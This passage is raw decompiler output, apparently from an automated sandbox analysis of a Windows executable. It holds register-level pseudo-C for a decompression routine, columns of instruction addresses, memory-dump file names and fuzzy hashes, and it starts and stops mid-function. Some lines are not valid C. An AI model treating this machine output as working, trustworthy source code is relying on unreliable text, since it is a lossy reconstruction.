                                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                                  												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                                  												_t80 =  &(__esi[1]);
                                                  												 *_t80 = __esi[1] - __edi;
                                                  												__eflags =  *_t80;
                                                  												if( *_t80 == 0) {
                                                  													L53:
                                                  													__eax = __esi[0x145];
                                                  													L54:
                                                  													 *__esi = __eax;
                                                  												}
                                                  												goto L157;
                                                  											}
                                                  											L32:
                                                  											__ecx = __esi[0x26e8];
                                                  											__edx =  *(__ebp - 0x30);
                                                  											__eflags = __edx - __ecx;
                                                  											if(__edx != __ecx) {
                                                  												L38:
                                                  												__esi[0x26ea] = __edx;
                                                  												__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
                                                  												__edx = __esi[0x26ea];
                                                  												__ecx = __esi[0x26e9];
                                                  												__eflags = __edx - __ecx;
                                                  												 *(__ebp - 0x30) = __edx;
                                                  												if(__edx >= __ecx) {
                                                  													__eax = __esi[0x26e8];
                                                  													__eax = __esi[0x26e8] - __edx;
                                                  													__eflags = __eax;
                                                  												} else {
                                                  													__ecx = __ecx - __edx;
                                                  													__eax = __ecx - __edx - 1;
                                                  												}
                                                  												__edi = __esi[0x26e8];
                                                  												 *(__ebp - 0x2c) = __eax;
                                                  												__eflags = __edx - __edi;
                                                  												if(__edx == __edi) {
                                                  													__edx =  &(__esi[0x6e8]);
                                                  													__eflags = __edx - __ecx;
                                                  													if(__eflags != 0) {
                                                  														 *(__ebp - 0x30) = __edx;
                                                  														if(__eflags >= 0) {
                                                  															__edi = __edi - __edx;
                                                  															__eflags = __edi;
                                                  															__eax = __edi;
                                                  														} else {
                                                  															__ecx = __ecx - __edx;
                                                  															__eax = __ecx;
                                                  														}
                                                  														 *(__ebp - 0x2c) = __eax;
                                                  													}
                                                  												}
                                                  												__eflags = __eax;
                                                  												if(__eax == 0) {
                                                  													goto L160;
                                                  												} else {
                                                  													goto L48;
                                                  												}
                                                  											}
                                                  											L33:
                                                  											__eax = __esi[0x26e9];
                                                  											__edi =  &(__esi[0x6e8]);
                                                  											__eflags = __eax - __edi;
                                                  											if(__eax == __edi) {
                                                  												goto L38;
                                                  											}
                                                  											L34:
                                                  											__edx = __edi;
                                                  											__eflags = __edx - __eax;
                                                  											 *(__ebp - 0x30) = __edx;
                                                  											if(__edx >= __eax) {
                                                  												__ecx = __ecx - __edx;
                                                  												__eflags = __ecx;
                                                  												__eax = __ecx;
                                                  											} else {
                                                  												__eax = __eax - __edx;
                                                  												__eax = __eax - 1;
                                                  											}
                                                  											__eflags = __eax;
                                                  											 *(__ebp - 0x2c) = __eax;
                                                  											if(__eax != 0) {
                                                  												goto L48;
                                                  											} else {
                                                  												goto L38;
                                                  											}
                                                  										case 0xb:
                                                  											goto L56;
                                                  										case 0xc:
                                                  											L60:
                                                  											__esi[1] = __esi[1] >> 0xa;
                                                  											__eax = (__esi[1] >> 0xa) + 4;
                                                  											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                  												goto L68;
                                                  											}
                                                  											goto L61;
                                                  										case 0xd:
                                                  											while(1) {
                                                  												L93:
                                                  												__eax = __esi[1];
                                                  												__ecx = __esi[2];
                                                  												__edx = __eax;
                                                  												__eax = __eax & 0x0000001f;
                                                  												__edx = __edx >> 5;
                                                  												__eax = __edx + __eax + 0x102;
                                                  												__eflags = __esi[2] - __eax;
                                                  												if(__esi[2] >= __eax) {
                                                  													break;
                                                  												}
                                                  												L73:
                                                  												__eax = __esi[0x143];
                                                  												while(1) {
                                                  													L76:
                                                  													__eflags = __ebx - __eax;
                                                  													if(__ebx >= __eax) {
                                                  														break;
                                                  													}
                                                  													L74:
                                                  													__eflags =  *(__ebp - 0x34);
                                                  													if( *(__ebp - 0x34) == 0) {
                                                  														goto L159;
                                                  													}
                                                  													L75:
                                                  													__ecx =  *(__ebp - 0x38);
                                                  													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                  													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                  													__ecx = __ebx;
                                                  													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                  													__ebx = __ebx + 8;
                                                  													__eflags = __ebx;
                                                  												}
                                                  												L77:
                                                  												__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
                                                  												__eax = __eax &  *(__ebp - 0x40);
                                                  												__ecx = __esi[0x144];
                                                  												__eax = __esi[0x144] + __eax * 4;
                                                  												__edx =  *(__eax + 1) & 0x000000ff;
                                                  												__eax =  *(__eax + 2) & 0x0000ffff;
                                                  												__eflags = __eax - 0x10;
                                                  												 *(__ebp - 0x14) = __eax;
                                                  												if(__eax >= 0x10) {
                                                  													L79:
                                                  													__eflags = __eax - 0x12;
                                                  													if(__eax != 0x12) {
                                                  														__eax = __eax + 0xfffffff2;
                                                  														 *(__ebp - 8) = 3;
                                                  													} else {
                                                  														_push(7);
                                                  														 *(__ebp - 8) = 0xb;
                                                  														_pop(__eax);
                                                  													}
                                                  													while(1) {
                                                  														L84:
                                                  														__ecx = __eax + __edx;
                                                  														__eflags = __ebx - __eax + __edx;
                                                  														if(__ebx >= __eax + __edx) {
                                                  															break;
                                                  														}
                                                  														L82:
                                                  														__eflags =  *(__ebp - 0x34);
                                                  														if( *(__ebp - 0x34) == 0) {
                                                  															goto L159;
                                                  														}
                                                  														L83:
                                                  														__ecx =  *(__ebp - 0x38);
                                                  														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                  														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                  														__ecx = __ebx;
                                                  														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                  														__ebx = __ebx + 8;
                                                  														__eflags = __ebx;
                                                  													}
                                                  													L85:
                                                  													__ecx = __edx;
                                                  													__ebx = __ebx - __edx;
                                                  													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                  													 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                  													__edx =  *(__ebp - 8);
                                                  													__ebx = __ebx - __eax;
                                                  													__edx =  *(__ebp - 8) + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                  													__ecx = __eax;
                                                  													__eax = __esi[1];
                                                  													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                  													__ecx = __esi[2];
                                                  													__eax = __eax >> 5;
                                                  													__edi = __eax >> 0x00000005 & 0x0000001f;
                                                  													__eax = __eax & 0x0000001f;
                                                  													__eax = __edi + __eax + 0x102;
                                                  													__edi = __edx + __ecx;
                                                  													__eflags = __edx + __ecx - __eax;
                                                  													if(__edx + __ecx > __eax) {
                                                  														goto L9;
                                                  													}
                                                  													L86:
                                                  													__eflags =  *(__ebp - 0x14) - 0x10;
                                                  													if( *(__ebp - 0x14) != 0x10) {
                                                  														L89:
                                                  														__edi = 0;
                                                  														__eflags = 0;
                                                  														L90:
                                                  														__eax = __esi + 0xc + __ecx * 4;
                                                  														do {
                                                  															L91:
                                                  															 *__eax = __edi;
                                                  															__ecx = __ecx + 1;
                                                  															__eax = __eax + 4;
                                                  															__edx = __edx - 1;
                                                  															__eflags = __edx;
                                                  														} while (__edx != 0);
                                                  														__esi[2] = __ecx;
                                                  														continue;
                                                  													}
                                                  													L87:
                                                  													__eflags = __ecx - 1;
                                                  													if(__ecx < 1) {
                                                  														goto L9;
                                                  													}
                                                  													L88:
                                                  													__edi =  *(__esi + 8 + __ecx * 4);
                                                  													goto L90;
                                                  												}
                                                  												L78:
                                                  												__ecx = __edx;
                                                  												__ebx = __ebx - __edx;
                                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                  												__ecx = __esi[2];
                                                  												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                                  												__esi[2] = __esi[2] + 1;
                                                  											}
                                                  											L94:
                                                  											__eax = __esi[1];
                                                  											__esi[0x144] = __esi[0x144] & 0x00000000;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                                  											__edi = __eax;
                                                  											__eax = __eax >> 5;
                                                  											__edi = __edi & 0x0000001f;
                                                  											__ecx = 0x101;
                                                  											__eax = __eax & 0x0000001f;
                                                  											__edi = __edi + 0x101;
                                                  											__eax = __eax + 1;
                                                  											__edx = __ebp - 0xc;
                                                  											 *(__ebp - 0x14) = __eax;
                                                  											 &(__esi[0x148]) = __ebp - 4;
                                                  											 *(__ebp - 4) = 9;
                                                  											__ebp - 0x18 =  &(__esi[3]);
                                                  											 *(__ebp - 0x10) = 6;
                                                  											__eax = E00406B2B( &(__esi[3]), __edi, 0x101, 0x4073fc, 0x40743c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                                  											__eflags =  *(__ebp - 4);
                                                  											if( *(__ebp - 4) == 0) {
                                                  												__eax = __eax | 0xffffffff;
                                                  												__eflags = __eax;
                                                  											}
                                                  											__eflags = __eax;
                                                  											if(__eax != 0) {
                                                  												goto L9;
                                                  											} else {
                                                  												L97:
                                                  												__ebp - 0xc =  &(__esi[0x148]);
                                                  												__ebp - 0x10 = __ebp - 0x1c;
                                                  												__eax = __esi + 0xc + __edi * 4;
                                                  												__eax = E00406B2B(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40747c, 0x4074b8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                                  												__eflags = __eax;
                                                  												if(__eax != 0) {
                                                  													goto L9;
                                                  												}
                                                  												L98:
                                                  												__eax =  *(__ebp - 0x10);
                                                  												__eflags =  *(__ebp - 0x10);
                                                  												if( *(__ebp - 0x10) != 0) {
                                                  													L100:
                                                  													__cl =  *(__ebp - 4);
                                                  													 *__esi =  *__esi & 0x00000000;
                                                  													__eflags =  *__esi;
                                                  													__esi[4] = __al;
                                                  													__eax =  *(__ebp - 0x18);
                                                  													__esi[5] =  *(__ebp - 0x18);
                                                  													__eax =  *(__ebp - 0x1c);
                                                  													__esi[4] = __cl;
                                                  													__esi[6] =  *(__ebp - 0x1c);
                                                  													goto L101;
                                                  												}
                                                  												L99:
                                                  												__eflags = __edi - 0x101;
                                                  												if(__edi > 0x101) {
                                                  													goto L9;
                                                  												}
                                                  												goto L100;
                                                  											}
                                                  										case 0xe:
                                                  											goto L9;
                                                  										case 0xf:
                                                  											L152:
                                                  											__eax =  *(__ebp - 0x30);
                                                  											__esi[0x26ea] =  *(__ebp - 0x30);
                                                  											__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
                                                  											__ecx = __esi[0x26ea];
                                                  											__edx = __esi[0x26e9];
                                                  											__eflags = __ecx - __edx;
                                                  											 *(__ebp - 0x30) = __ecx;
                                                  											if(__ecx >= __edx) {
                                                  												__eax = __esi[0x26e8];
                                                  												__eax = __esi[0x26e8] - __ecx;
                                                  												__eflags = __eax;
                                                  											} else {
                                                  												__edx = __edx - __ecx;
                                                  												__eax = __edx - __ecx - 1;
                                                  											}
                                                  											__eflags = __ecx - __edx;
                                                  											 *(__ebp - 0x2c) = __eax;
                                                  											if(__ecx != __edx) {
                                                  												L160:
                                                  												__edi = 0;
                                                  												goto L10;
                                                  											} else {
                                                  												L156:
                                                  												__eax = __esi[0x145];
                                                  												__eflags = __eax - 8;
                                                  												 *__esi = __eax;
                                                  												if(__eax != 8) {
                                                  													L161:
                                                  													0 = 1;
                                                  													goto L10;
                                                  												}
                                                  												goto L157;
                                                  											}
                                                  									}
                                                  								}
                                                  								L158:
                                                  								goto L9;
                                                  							}
                                                  							L70:
                                                  							if( *__edi == __eax) {
                                                  								goto L72;
                                                  							}
                                                  							L71:
                                                  							__esi[2] = __esi[2] & __eax;
                                                  							 *__esi = 0xd;
                                                  							goto L93;
                                                  						}
                                                  					}
                                                  				}
                                                  				L159:
                                                  				_t414 = 0;
                                                  				_t417[0x147] =  *(_t419 - 0x40);
                                                  				_t417[0x146] = _t396;
                                                  				( *(_t419 + 8))[1] = 0;
                                                  				goto L11;
                                                  			}









                                                  0x0040679c
                                                  0x0040679c
                                                  0x004067a3
                                                  0x004067a3
                                                  0x004067ab
                                                  0x004067ae
                                                  0x004067b1
                                                  0x004067b4
                                                  0x004067b8
                                                  0x004067bb
                                                  0x004067bd
                                                  0x004067c0
                                                  0x004067c3
                                                  0x004067dd
                                                  0x004067dd
                                                  0x004067e0
                                                  0x00000000
                                                  0x00000000
                                                  0x004067e6
                                                  0x004067e6
                                                  0x004067e9
                                                  0x004067f0
                                                  0x00000000
                                                  0x004067f0
                                                  0x004067c5
                                                  0x004067c8
                                                  0x004067cf
                                                  0x004067d2
                                                  0x00000000
                                                  0x00000000
                                                  0x004067f8
                                                  0x004067f8
                                                  0x0040681d
                                                  0x0040681d
                                                  0x0040681d
                                                  0x0040681f
                                                  0x00000000
                                                  0x00000000
                                                  0x004067fd
                                                  0x004067fd
                                                  0x00406801
                                                  0x00000000
                                                  0x00000000
                                                  0x00406807
                                                  0x00406807
                                                  0x0040680a
                                                  0x0040680d
                                                  0x00406810
                                                  0x00406812
                                                  0x00406814
                                                  0x00406817
                                                  0x0040681a
                                                  0x0040681a
                                                  0x0040681a
                                                  0x00406821
                                                  0x00406829
                                                  0x0040682c
                                                  0x0040682f
                                                  0x00406831
                                                  0x00406834
                                                  0x00406836
                                                  0x00000000
                                                  0x00000000
                                                  0x0040683c
                                                  0x0040683c
                                                  0x0040683f
                                                  0x00406840
                                                  0x00406841
                                                  0x00406843
                                                  0x00406847
                                                  0x00000000
                                                  0x00406942
                                                  0x00406942
                                                  0x00406945
                                                  0x00406948
                                                  0x0040694a
                                                  0x004069e1
                                                  0x004069e1
                                                  0x004069e4
                                                  0x004069e6
                                                  0x004069e7
                                                  0x004069e8
                                                  0x004069eb
                                                  0x00000000
                                                  0x004069eb
                                                  0x00406950
                                                  0x00406950
                                                  0x00406956
                                                  0x00406958
                                                  0x0040697d
                                                  0x00406980
                                                  0x00406986
                                                  0x0040698b
                                                  0x00406991
                                                  0x00406997
                                                  0x00406999
                                                  0x0040699c
                                                  0x004069a5
                                                  0x004069ab
                                                  0x004069ab
                                                  0x0040699e
                                                  0x004069a0
                                                  0x004069a2
                                                  0x004069a2
                                                  0x004069ad
                                                  0x004069b3
                                                  0x004069b5
                                                  0x004069b8
                                                  0x004069ba
                                                  0x004069c0
                                                  0x004069c2
                                                  0x004069c4
                                                  0x004069c6
                                                  0x004069c8
                                                  0x004069cb
                                                  0x004069d4
                                                  0x004069d7
                                                  0x004069d7
                                                  0x004069cd
                                                  0x004069cd
                                                  0x004069d0
                                                  0x004069d0
                                                  0x004069cb
                                                  0x004069c2
                                                  0x004069d9
                                                  0x004069db
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004069db
                                                  0x0040695a
                                                  0x0040695a
                                                  0x00406960
                                                  0x00406966
                                                  0x00406968
                                                  0x00000000
                                                  0x00000000
                                                  0x0040696a
                                                  0x0040696a
                                                  0x0040696c
                                                  0x0040696e
                                                  0x00406975
                                                  0x00406975
                                                  0x00406977
                                                  0x00406970
                                                  0x00406970
                                                  0x00406972
                                                  0x00406972
                                                  0x00406979
                                                  0x0040697b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004069f3
                                                  0x004069f3
                                                  0x004069f6
                                                  0x004069f8
                                                  0x004069fb
                                                  0x004069fe
                                                  0x004069fe
                                                  0x004069fe
                                                  0x004069fe
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004060ac
                                                  0x00406090
                                                  0x00000000
                                                  0x00406096
                                                  0x00406099
                                                  0x004060a3
                                                  0x004060a6
                                                  0x004060a9
                                                  0x00000000
                                                  0x004060a9
                                                  0x00406090
                                                  0x004060b4
                                                  0x004060b7
                                                  0x004060bb
                                                  0x004060c5
                                                  0x004060cf
                                                  0x004060d2
                                                  0x004060d8
                                                  0x0040620c
                                                  0x0040620e
                                                  0x00406214
                                                  0x00406217
                                                  0x0040621a
                                                  0x00000000
                                                  0x0040621a
                                                  0x004060de
                                                  0x004060de
                                                  0x004060df
                                                  0x00406137
                                                  0x00406137
                                                  0x0040613e
                                                  0x004061e4
                                                  0x004061e4
                                                  0x004061e9
                                                  0x004061ec
                                                  0x004061f1
                                                  0x004061f4
                                                  0x004061f9
                                                  0x004061fc
                                                  0x00406201
                                                  0x00406204
                                                  0x00406204
                                                  0x00000000
                                                  0x00406144
                                                  0x00406144
                                                  0x00406144
                                                  0x00406144
                                                  0x00406148
                                                  0x0040614d
                                                  0x0040614d
                                                  0x0040614d
                                                  0x00406152
                                                  0x00406154
                                                  0x00406156
                                                  0x0040615b
                                                  0x00406161
                                                  0x00406166
                                                  0x00406168
                                                  0x00406168
                                                  0x0040615d
                                                  0x0040615d
                                                  0x0040615d
                                                  0x0040615b
                                                  0x0040616a
                                                  0x0040616d
                                                  0x0040616f
                                                  0x00406172
                                                  0x00406172
                                                  0x004061a6
                                                  0x004061ab
                                                  0x004061ad
                                                  0x004061ae
                                                  0x004061b0
                                                  0x004061b1
                                                  0x004061b1
                                                  0x004061b1
                                                  0x004061d9
                                                  0x004061de
                                                  0x004061de
                                                  0x00000000
                                                  0x004061de
                                                  0x0040613e
                                                  0x004060e1
                                                  0x004060e1
                                                  0x004060e2
                                                  0x0040612c
                                                  0x00000000
                                                  0x0040612c
                                                  0x004060e4
                                                  0x004060e5
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406241
                                                  0x00406241
                                                  0x00406241
                                                  0x00406244
                                                  0x00000000
                                                  0x00000000
                                                  0x00406221
                                                  0x00406221
                                                  0x00406225
                                                  0x00000000
                                                  0x00000000
                                                  0x0040622b
                                                  0x0040622b
                                                  0x0040622e
                                                  0x00406231
                                                  0x00406236
                                                  0x00406238
                                                  0x0040623b
                                                  0x0040623e
                                                  0x0040623e
                                                  0x0040623e
                                                  0x00406246
                                                  0x00406246
                                                  0x00406249
                                                  0x0040624b
                                                  0x00406250
                                                  0x00406253
                                                  0x00406255
                                                  0x00406258
                                                  0x00000000
                                                  0x00000000
                                                  0x0040625e
                                                  0x0040625e
                                                  0x00406260
                                                  0x00000000
                                                  0x00000000
                                                  0x00406266
                                                  0x00406266
                                                  0x0040626a
                                                  0x00000000
                                                  0x00000000
                                                  0x00406270
                                                  0x00406270
                                                  0x00406273
                                                  0x00406275
                                                  0x00406313
                                                  0x00406313
                                                  0x00406316
                                                  0x00406318
                                                  0x00406318
                                                  0x0040631b
                                                  0x0040631e
                                                  0x00406320
                                                  0x00406322
                                                  0x00406324
                                                  0x00406324
                                                  0x0040632d
                                                  0x00406332
                                                  0x00406335
                                                  0x00406338
                                                  0x0040633b
                                                  0x0040633e
                                                  0x0040633e
                                                  0x0040633e
                                                  0x00406341
                                                  0x00406347
                                                  0x00406347
                                                  0x0040634d
                                                  0x0040634d
                                                  0x0040634d
                                                  0x00000000
                                                  0x00406341
                                                  0x0040627b
                                                  0x0040627b
                                                  0x00406281
                                                  0x00406284
                                                  0x00406286
                                                  0x004062b1
                                                  0x004062b4
                                                  0x004062ba
                                                  0x004062bf
                                                  0x004062c5
                                                  0x004062cb
                                                  0x004062cd
                                                  0x004062d0
                                                  0x004062d9
                                                  0x004062df
                                                  0x004062df
                                                  0x004062d2
                                                  0x004062d4
                                                  0x004062d6
                                                  0x004062d6
                                                  0x004062e1
                                                  0x004062e7
                                                  0x004062ea
                                                  0x004062ec
                                                  0x004062ee
                                                  0x004062f4
                                                  0x004062f6
                                                  0x004062f8
                                                  0x004062fb
                                                  0x00406304
                                                  0x00406304
                                                  0x00406306
                                                  0x004062fd
                                                  0x004062fd
                                                  0x00406300
                                                  0x00406300
                                                  0x00406308
                                                  0x00406308
                                                  0x004062f6
                                                  0x0040630b
                                                  0x0040630d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040630d
                                                  0x00406288
                                                  0x00406288
                                                  0x0040628e
                                                  0x00406294
                                                  0x00406296
                                                  0x00000000
                                                  0x00000000
                                                  0x00406298
                                                  0x00406298
                                                  0x0040629a
                                                  0x0040629c
                                                  0x0040629f
                                                  0x004062a6
                                                  0x004062a6
                                                  0x004062a8
                                                  0x004062a1
                                                  0x004062a1
                                                  0x004062a3
                                                  0x004062a3
                                                  0x004062aa
                                                  0x004062ac
                                                  0x004062af
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004063b3
                                                  0x004063b6
                                                  0x004063b9
                                                  0x004063bf
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406596
                                                  0x00406596
                                                  0x00406596
                                                  0x00406599
                                                  0x0040659c
                                                  0x0040659e
                                                  0x004065a1
                                                  0x004065a7
                                                  0x004065ae
                                                  0x004065b0
                                                  0x00000000
                                                  0x00000000
                                                  0x00406484
                                                  0x00406484
                                                  0x004064ac
                                                  0x004064ac
                                                  0x004064ac
                                                  0x004064ae
                                                  0x00000000
                                                  0x00000000
                                                  0x0040648c
                                                  0x0040648c
                                                  0x00406490
                                                  0x00000000
                                                  0x00000000
                                                  0x00406496
                                                  0x00406496
                                                  0x00406499
                                                  0x0040649c
                                                  0x0040649f
                                                  0x004064a1
                                                  0x004064a3
                                                  0x004064a6
                                                  0x004064a9
                                                  0x004064a9
                                                  0x004064a9
                                                  0x004064b0
                                                  0x004064b0
                                                  0x004064b8
                                                  0x004064bb
                                                  0x004064c1
                                                  0x004064c4

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 54d80564fe19f3f3404c6606d58c011d861cfab5a50afacd25c13b8f5d904866
                                                  • Instruction ID: 2fa80b96e0c3f2f9afba8e6e6bfd5b6e13d9d39ff7e82b1c07230a33620f403b
                                                  • Opcode Fuzzy Hash: 54d80564fe19f3f3404c6606d58c011d861cfab5a50afacd25c13b8f5d904866
                                                  • Instruction Fuzzy Hash: 5BE1797190070ADFDB24CF58C980BAEBBF5EB45305F15892EE897A7291D338A991CF14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00406B2B(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                  				signed int _v8;
                                                  				unsigned int _v12;
                                                  				signed int _v16;
                                                  				intOrPtr _v20;
                                                  				signed int _v24;
                                                  				signed int _v28;
                                                  				intOrPtr* _v32;
                                                  				signed int* _v36;
                                                  				signed int _v40;
                                                  				signed int _v44;
                                                  				intOrPtr _v48;
                                                  				intOrPtr _v52;
                                                  				void _v116;
                                                  				signed int _v176;
                                                  				signed int _v180;
                                                  				signed int _v240;
                                                  				signed int _t166;
                                                  				signed int _t168;
                                                  				intOrPtr _t175;
                                                  				signed int _t181;
                                                  				void* _t182;
                                                  				intOrPtr _t183;
                                                  				signed int* _t184;
                                                  				signed int _t186;
                                                  				signed int _t187;
                                                  				signed int* _t189;
                                                  				signed int _t190;
                                                  				intOrPtr* _t191;
                                                  				intOrPtr _t192;
                                                  				signed int _t193;
                                                  				signed int _t195;
                                                  				signed int _t200;
                                                  				signed int _t205;
                                                  				void* _t207;
                                                  				short _t208;
                                                  				signed char _t222;
                                                  				signed int _t224;
                                                  				signed int _t225;
                                                  				signed int* _t232;
                                                  				signed int _t233;
                                                  				signed int _t234;
                                                  				void* _t235;
                                                  				signed int _t236;
                                                  				signed int _t244;
                                                  				signed int _t246;
                                                  				signed int _t251;
                                                  				signed int _t254;
                                                  				signed int _t256;
                                                  				signed int _t259;
                                                  				signed int _t262;
                                                  				void* _t263;
                                                  				void* _t264;
                                                  				signed int _t267;
                                                  				intOrPtr _t269;
                                                  				intOrPtr _t271;
                                                  				signed int _t274;
                                                  				intOrPtr* _t275;
                                                  				unsigned int _t276;
                                                  				void* _t277;
                                                  				signed int _t278;
                                                  				intOrPtr* _t279;
                                                  				signed int _t281;
                                                  				intOrPtr _t282;
                                                  				intOrPtr _t283;
                                                  				signed int* _t284;
                                                  				signed int _t286;
                                                  				signed int _t287;
                                                  				signed int _t288;
                                                  				signed int _t296;
                                                  				signed int* _t297;
                                                  				intOrPtr _t298;
                                                  				void* _t299;
                                                  
                                                  				_t278 = _a8;
                                                  				_t187 = 0x10;
                                                  				memset( &_v116, 0, _t187 << 2);
                                                  				_t189 = _a4;
                                                  				_t233 = _t278;
                                                  				do {
                                                  					_t166 =  *_t189;
                                                  					_t189 =  &(_t189[1]);
                                                  					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                  					_t233 = _t233 - 1;
                                                  				} while (_t233 != 0);
                                                  				if(_v116 != _t278) {
                                                  					_t279 = _a28;
                                                  					_t267 =  *_t279;
                                                  					_t190 = 1;
                                                  					_a28 = _t267;
                                                  					_t234 = 0xf;
                                                  					while(1) {
                                                  						_t168 = 0;
                                                  						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                  							break;
                                                  						}
                                                  						_t190 = _t190 + 1;
                                                  						if(_t190 <= _t234) {
                                                  							continue;
                                                  						}
                                                  						break;
                                                  					}
                                                  					_v8 = _t190;
                                                  					if(_t267 < _t190) {
                                                  						_a28 = _t190;
                                                  					}
                                                  					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                  						_t234 = _t234 - 1;
                                                  						if(_t234 != 0) {
                                                  							continue;
                                                  						}
                                                  						break;
                                                  					}
                                                  					_v28 = _t234;
                                                  					if(_a28 > _t234) {
                                                  						_a28 = _t234;
                                                  					}
                                                  					 *_t279 = _a28;
                                                  					_t181 = 1 << _t190;
                                                  					while(_t190 < _t234) {
                                                  						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                  						if(_t182 < 0) {
                                                  							L64:
                                                  							return _t168 | 0xffffffff;
                                                  						}
                                                  						_t190 = _t190 + 1;
                                                  						_t181 = _t182 + _t182;
                                                  					}
                                                  					_t281 = _t234 << 2;
                                                  					_t191 = _t299 + _t281 - 0x70;
                                                  					_t269 =  *_t191;
                                                  					_t183 = _t181 - _t269;
                                                  					_v52 = _t183;
                                                  					if(_t183 < 0) {
                                                  						goto L64;
                                                  					}
                                                  					_v176 = _t168;
                                                  					 *_t191 = _t269 + _t183;
                                                  					_t192 = 0;
                                                  					_t235 = _t234 - 1;
                                                  					if(_t235 == 0) {
                                                  						L21:
                                                  						_t184 = _a4;
                                                  						_t271 = 0;
                                                  						do {
                                                  							_t193 =  *_t184;
                                                  							_t184 =  &(_t184[1]);
                                                  							if(_t193 != _t168) {
                                                  								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                  								_t236 =  *_t232;
                                                  								 *((intOrPtr*)(0x42ceb8 + _t236 * 4)) = _t271;
                                                  								 *_t232 = _t236 + 1;
                                                  							}
                                                  							_t271 = _t271 + 1;
                                                  						} while (_t271 < _a8);
                                                  						_v16 = _v16 | 0xffffffff;
                                                  						_v40 = _v40 & 0x00000000;
                                                  						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                  						_t195 = _v8;
                                                  						_t186 =  ~_a28;
                                                  						_v12 = _t168;
                                                  						_v180 = _t168;
                                                  						_v36 = 0x42ceb8;
                                                  						_v240 = _t168;
                                                  						if(_t195 > _v28) {
                                                  							L62:
                                                  							_t168 = 0;
                                                  							if(_v52 == 0 || _v28 == 1) {
                                                  								return _t168;
                                                  							} else {
                                                  								goto L64;
                                                  							}
                                                  						}
                                                  						_v44 = _t195 - 1;
                                                  						_v32 = _t299 + _t195 * 4 - 0x70;
                                                  						do {
                                                  							_t282 =  *_v32;
                                                  							if(_t282 == 0) {
                                                  								goto L61;
                                                  							}
                                                  							while(1) {
                                                  								_t283 = _t282 - 1;
                                                  								_t200 = _a28 + _t186;
                                                  								_v48 = _t283;
                                                  								_v24 = _t200;
                                                  								if(_v8 <= _t200) {
                                                  									goto L45;
                                                  								}
                                                  								L31:
                                                  								_v20 = _t283 + 1;
                                                  								do {
                                                  									_v16 = _v16 + 1;
                                                  									_t296 = _v28 - _v24;
                                                  									if(_t296 > _a28) {
                                                  										_t296 = _a28;
